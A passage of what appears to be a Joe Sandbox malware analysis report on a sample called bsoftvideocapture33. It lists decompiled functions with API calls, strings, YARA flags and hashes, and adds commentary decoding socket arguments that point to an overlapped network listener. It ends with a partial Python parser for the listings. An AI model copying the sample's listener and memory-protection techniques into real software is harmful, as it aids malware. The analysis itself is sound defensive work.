                                                                                                                                        • Instruction Fuzzy Hash: FF4192317003159BDB3C9E6DDCC4A6AF7A9EF81654B004A2DE856D72C1CB70F909CBA5
                                                                                                                                        APIs
                                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 02C030C3
                                                                                                                                        • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02C03102
                                                                                                                                        • _memcmp.LIBCMT ref: 02C03141
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastString_memcmp
                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                        • API String ID: 1618111833-2422070025
                                                                                                                                        • Opcode ID: 58104b28ceb9305b633212f70f84b018d094292f191edc1ff47ed6eaf2012f92
                                                                                                                                        • Instruction ID: 79d5681094aacf3ec278dae967853661e231b9d74f1b915e50cf6856bfa9f634
                                                                                                                                        • Opcode Fuzzy Hash: 58104b28ceb9305b633212f70f84b018d094292f191edc1ff47ed6eaf2012f92
                                                                                                                                        • Instruction Fuzzy Hash: 2731D3729003449FDB30AF64CCC076EB7A6AF89354F1085ADE9559B2C0DB729E45CF90
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$Protect$Query
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 3618607426-2766056989
                                                                                                                                        • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                                                                        • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                                                                                        • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                                                                          • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                                                                        • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                                                                        • String ID: d
                                                                                                                                        • API String ID: 211589378-2564639436
                                                                                                                                        • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                                                                        • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                                                                                        • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C01F5B
                                                                                                                                        • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02C01FC5
                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 02C01FD2
                                                                                                                                          • Part of subcall function 02C01712: __EH_prolog.LIBCMT ref: 02C01717
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                                                                        • String ID: iocp
                                                                                                                                        • API String ID: 998023749-976528080
                                                                                                                                        • Opcode ID: 8a065096b8e3fe6bd658684e68c6b443cac065e11344d0ff34380ff49c7c3636
                                                                                                                                        • Instruction ID: db779d39ed5f2141d8f6a027a4e33cb5a0c7589e616aabce16425b73f4f6994f
                                                                                                                                        • Instruction Fuzzy Hash: 0B21E7B1801B549FC720DF6AC54455BFBF8FF94720B108A1FD4A683A90DBB0A604CF91
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 02C127DD
                                                                                                                                          • Part of subcall function 02C11FBC: __FF_MSGBANNER.LIBCMT ref: 02C11FD3
                                                                                                                                          • Part of subcall function 02C11FBC: __NMSG_WRITE.LIBCMT ref: 02C11FDA
                                                                                                                                          • Part of subcall function 02C11FBC: RtlAllocateHeap.NTDLL(00880000,00000000,00000001), ref: 02C11FFF
                                                                                                                                        • std::exception::exception.LIBCMT ref: 02C127FB
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 02C12810
                                                                                                                                          • Part of subcall function 02C131CA: RaiseException.KERNEL32(?,?,02C0EB64,?,?,?,?,?,?,?,02C0EB64,?,02C2ECA8,?), ref: 02C1321F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                        • String ID: bad allocation
                                                                                                                                        • API String ID: 3074076210-2104205924
                                                                                                                                        • Opcode ID: 5b2ca74e828bbd222fb4f54eafc7e7b55619edc9f71eb0614c915a728e9f87bf
                                                                                                                                        • Instruction ID: 6269974d1c4456c59dc859930b096ed4bd45e6f0cf2290292ec34839539f9976
                                                                                                                                        • Instruction Fuzzy Hash: C4E0307850021EAADB01FAA4CD029AF776DAF02304F100595DC1566590EF719B54B9E2
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C037B6
                                                                                                                                        • __localtime64.LIBCMT ref: 02C037C1
                                                                                                                                          • Part of subcall function 02C11610: __gmtime64_s.LIBCMT ref: 02C11623
                                                                                                                                        • std::exception::exception.LIBCMT ref: 02C037D9
                                                                                                                                          • Part of subcall function 02C114E3: std::exception::_Copy_str.LIBCMT ref: 02C114FC
                                                                                                                                          • Part of subcall function 02C0952D: __EH_prolog.LIBCMT ref: 02C09532
                                                                                                                                          • Part of subcall function 02C0952D: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C09541
                                                                                                                                          • Part of subcall function 02C0952D: __CxxThrowException@8.LIBCMT ref: 02C09560
                                                                                                                                        Strings
                                                                                                                                        • could not convert calendar time to UTC time, xrefs: 02C037CE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                                                                        • String ID: could not convert calendar time to UTC time
                                                                                                                                        • API String ID: 1963798777-2088861013
                                                                                                                                        • Opcode ID: 5b8caa0e7936a3087419675739a1699ce7fa1c5d9b1d07a9c70233d8ddcbc5eb
                                                                                                                                        • Instruction ID: 4fc60aa5bd9bcf808eac4b368444b1df8116a6428e18f0f678ae27748ef79554
                                                                                                                                        • Instruction Fuzzy Hash: ECE06DF2D00129DACF00EFD8D9417EEB779EB01310F008999D825A3581DF3A9619EE91
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                                                                        • API String ID: 1646373207-2713375476
                                                                                                                                        • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                                                                        • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                                                                                        • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,004028E9), ref: 00402CCF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00402CDF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                                                        • Opcode ID: d54598a83eb0baa68b6903309d995a9c08ead6f1cb52c8cdd87b98e358e571e4
                                                                                                                                        • Instruction ID: 2adebd830dd3b14d64e79f2d4f5eff8f6aaaa0a0dfbfbc424d90c26f206a1370
                                                                                                                                        • Instruction Fuzzy Hash: 8EC01220388602ABFE902BB14F0EB2A21082F00B82F14407E6589F02C0CEBCC008903D
                                                                                                                                        APIs
                                                                                                                                        • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403BAA), ref: 004047AD
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403BAA), ref: 004047D1
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403BAA), ref: 004047EB
                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403BAA), ref: 004048AC
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403BAA), ref: 004048C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual$FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 714016831-0
                                                                                                                                        • Opcode ID: cdae8ae5a690afa4d4f5a0e9c68b0154a05ea86f62aef1c42ef49f39af8a83b4
                                                                                                                                        • Instruction ID: 6e3f28a325fdea7f1120dddc177c98cba6358bc66e7b898124441de81bb44451
                                                                                                                                        • Instruction Fuzzy Hash: 023104B65407019FD3309F24DD84B62B7E0EB88B54F10CA3AEA95B76D1D778A8448B5C
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustPointer_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1721217611-0
                                                                                                                                        • Opcode ID: 2c4dca0f6826aa15e7574a11dacd8b3f039dad988627f333ea5c1f2f26cc7d14
                                                                                                                                        • Instruction ID: c987ee2ed7adc3382d41aa35d9529b403a0ff6c889c2dd9a997f92aa2dad91b6
                                                                                                                                        • Instruction Fuzzy Hash: 7C413A352043839FEB386F25D963B7633E5AF53724F14801DE851866D0EB71E680FA51
APIs
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C04149), ref: 02C103CF
  • Part of subcall function 02C03FDC: __EH_prolog.LIBCMT ref: 02C03FE1
  • Part of subcall function 02C03FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02C03FF3
• CloseHandle.KERNEL32(00000000), ref: 02C103C4
• CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02C04149), ref: 02C10410
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02C04149), ref: 02C104E1
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: CloseHandle$Event$CreateH_prolog
• String ID:
• API String ID: 2825413587-0
• Opcode ID: bc435e2dbdbb072cc056d905f3fc4630121998d3677d07125cea2cd5ffd80583
• Instruction ID: 830760c846b7f1ad56a7ba8d3f4086fcf45c181a1d6f2954d45c3231f474629a
• Opcode Fuzzy Hash: bc435e2dbdbb072cc056d905f3fc4630121998d3677d07125cea2cd5ffd80583
• Instruction Fuzzy Hash: 9C51E2716043098BDB20DF28C88675A77E4BF8A328F594628FC6D97380DB35D985DB91
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C1E2EC
• __isleadbyte_l.LIBCMT ref: 02C1E31A
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,00000000,00000000,?,?,?), ref: 02C1E348
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,00000000,00000000,?,?,?), ref: 02C1E37E
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 5665ecec73e57f904d6d9d06adfb94626bd2d83c3de7d7924543fbd7f3a74e3b
• Instruction ID: 6254f46e3dc4bd9ad44ae7b24cf1babf68b2aab3378db4bba1992a97a80c4d99
• Opcode Fuzzy Hash: 5665ecec73e57f904d6d9d06adfb94626bd2d83c3de7d7924543fbd7f3a74e3b
• Instruction Fuzzy Hash: 9631B030600256EFEB258E75C846BAE7BB6FF82314F554628EC68C7190E730DA51FB90
APIs
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
• String ID:
• API String ID: 1648232842-0
• Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
• Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
• Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
• Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
APIs
• sqlite3_step.SQLITE3 ref: 609614AB
• sqlite3_reset.SQLITE3 ref: 609614BF
  • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
  • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
• sqlite3_column_int64.SQLITE3 ref: 609614D4
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
• String ID:
• API String ID: 3429445273-0
• Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
• Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
• Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
• Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
APIs
• htons.WS2_32(?), ref: 02C03DA2
  • Part of subcall function 02C03BD3: __EH_prolog.LIBCMT ref: 02C03BD8
  • Part of subcall function 02C03BD3: std::bad_exception::bad_exception.LIBCMT ref: 02C03BED
• htonl.WS2_32(00000000), ref: 02C03DB9
• htonl.WS2_32(00000000), ref: 02C03DC0
• htons.WS2_32(?), ref: 02C03DD4
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
• String ID:
• API String ID: 3882411702-0
• Opcode ID: 556cad7321ba2e00e1df2210b78f74a3f08f7e4ac314b5c1c38b144f334aac3d
• Instruction ID: ec25663fd63ffc1309f8bdd48bc03ce8ca6892fcb9e7a05487206645686c777c
• Opcode Fuzzy Hash: 556cad7321ba2e00e1df2210b78f74a3f08f7e4ac314b5c1c38b144f334aac3d
• Instruction Fuzzy Hash: 5E11CE35A10358EFCF119F64D885AAAB7B9FF08310F018496FC04DF240EA719A18CBA1
APIs
• sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
• sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
• sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
• sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_mutex_entersqlite3_mutex_leave
• String ID:
• API String ID: 1477753154-0
• Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
• Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
• Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
• Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
APIs
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02C023D0
• RtlEnterCriticalSection.NTDLL(?), ref: 02C023DE
• InterlockedExchange.KERNEL32(?,00000001), ref: 02C02401
• RtlLeaveCriticalSection.NTDLL(?), ref: 02C02408
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
• String ID:
• API String ID: 4018804020-0
• Opcode ID: 7b3126680318c07b459d56b2b6eb3220289d2389af39c708e3aebf48538cd398
• Instruction ID: 00f5806e6d4208b13817b87c04bd1f8b64951e4781a0ccf899b1c5da3cc348e7
• Opcode Fuzzy Hash: 7b3126680318c07b459d56b2b6eb3220289d2389af39c708e3aebf48538cd398
• Instruction Fuzzy Hash: 6811CE72650304AFDB249F60D888B67BBB8FF44759F10446DEA019B180DBB1E955CBE1
APIs
• WSASetLastError.WS2_32(00000000), ref: 02C02EEE
• WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C02EFD
• WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C02F0C
• setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02C02F36
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: ErrorLast$Socketsetsockopt
• String ID:
• API String ID: 2093263913-0
• Opcode ID: d21e220b9c3e32a9d3463864687e26ca2aeb4c2b77d94aa5a0981311bf92f856
• Instruction ID: 91e0a7ba9de3d7346740aa619601b6335e152de585bdfc6876887d271d53a48d
• Opcode Fuzzy Hash: d21e220b9c3e32a9d3463864687e26ca2aeb4c2b77d94aa5a0981311bf92f856
• Instruction Fuzzy Hash: BF018871910314BBDB305F65DC88B5B7BA9DB857B1F018569FA18DB181DB7189008BA0
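The argument columns in these listings are the values the static pass recovered at each call site (`?` where nothing was recovered), and decoding them is the quickest way to see what a function sets up. In the block above, `setsockopt` is called with level 0x29 (IPPROTO_IPV6) and option 0x1B (IPV6_V6ONLY) with a 4-byte value, and `WSASocketA` with dwFlags 1 (WSA_FLAG_OVERLAPPED), which fits the overlapped-I/O listener implied by the PostQueuedCompletionStatus block above and the "open a port and listen" signature in the overview. The option value itself sits behind a pointer the listing does not resolve, so whether the listener is IPv6-only or dual-stack cannot be read from the line. The following Python is an added example for reading this report, not code from Joe Sandbox or from the sample: it parses lines in the report's `APIs` format and names the Winsock constants. The sample lines are copied from this page; the constant tables are an assumption taken from the public Windows SDK headers (winsock2.h, ws2ipdef.h), not something the report states.

```python
"""Parse Joe Sandbox 'APIs' lines and name the Winsock constants they carry.

Added example for reading this report; not code from Joe Sandbox or from the
sample. Argument values are whatever the static pass recovered at the call site
('?' = not recovered), so they are decoded, not trusted as runtime values.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample input: lines copied from the report's WSASocketA/setsockopt
# function block (02C02EEE-02C02F36) plus one 'Part of subcall' line from the htons block.
SAMPLE_LINES = [
    "• WSASetLastError.WS2_32(00000000), ref: 02C02EEE",
    "• WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C02EFD",
    "• WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C02F0C",
    "• setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02C02F36",
    "  • Part of subcall function 02C03BD3: __EH_prolog.LIBCMT ref: 02C03BD8",
]

# Constant tables from the public Windows SDK headers (winsock2.h, ws2ipdef.h).
# They are an assumption of this example, not something the report states.
LEVELS: Dict[int, str] = {0xFFFF: "SOL_SOCKET", 0: "IPPROTO_IP", 6: "IPPROTO_TCP",
                          17: "IPPROTO_UDP", 41: "IPPROTO_IPV6"}
OPTNAMES: Dict[str, Dict[int, str]] = {
    "SOL_SOCKET": {0x0004: "SO_REUSEADDR", 0x0008: "SO_KEEPALIVE",
                   0x1001: "SO_SNDBUF", 0x1002: "SO_RCVBUF"},
    "IPPROTO_TCP": {1: "TCP_NODELAY"},
    "IPPROTO_IPV6": {27: "IPV6_V6ONLY"},
}
WSA_FLAGS: Dict[int, str] = {0x01: "WSA_FLAG_OVERLAPPED", 0x80: "WSA_FLAG_NO_HANDLE_INHERIT"}

Arg = Optional[int]  # None stands for a '?' column


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: str                       # address of the call site
    subcall: Optional[str] = None  # callee address when the line is 'Part of subcall function'


LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[\w:.$~]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_arg(token: str) -> Arg:
    token = token.strip()
    return None if token == "?" else int(token, 16)  # int() also accepts '-00000200'


def parse_line(line: str) -> Optional[ApiCall]:
    """One report line -> ApiCall, or None for headings such as 'APIs' or 'Memory Dump Source'."""
    m = LINE_RE.match(line)
    if not m:
        return None
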